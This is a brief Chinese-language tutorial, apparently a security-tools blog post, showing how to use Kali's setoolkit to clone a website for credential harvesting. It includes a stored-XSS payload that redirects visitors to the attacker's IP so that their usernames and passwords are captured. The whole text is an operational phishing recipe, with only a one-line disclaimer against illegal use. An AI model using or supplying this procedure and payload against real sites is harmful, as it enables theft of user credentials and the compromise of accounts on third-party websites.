書上說,如果有一天你夢見了一個(gè)很久沒有見面的人,代表他正在遺忘你。。。
今天給大家介紹一款克隆網(wǎng)站工具:setoolkit
一、環(huán)境:kali 2019.04
二、用法:
1、打開終端,輸入setoolkit
2、選擇Social-Engineering Attacks
3、選擇Website Attack Vectors
4、選擇Credential Harvester Attack Method
5、選擇Site Cloner,輸入要克隆的網(wǎng)址
6、構(gòu)造存在xss漏洞的payload,在存儲(chǔ)型xss漏洞處輸入下面腳本,提交
<script>window.location="http://192.168.152.171"</script>
7、自動(dòng)跳轉(zhuǎn)到我們克隆的界面
8、隨便輸入賬號,提交
9、在kali機(jī)看到輸入的賬號和密碼
禁止非法,后果自負(fù)
歡迎大家關(guān)注公眾號:web安全工具庫
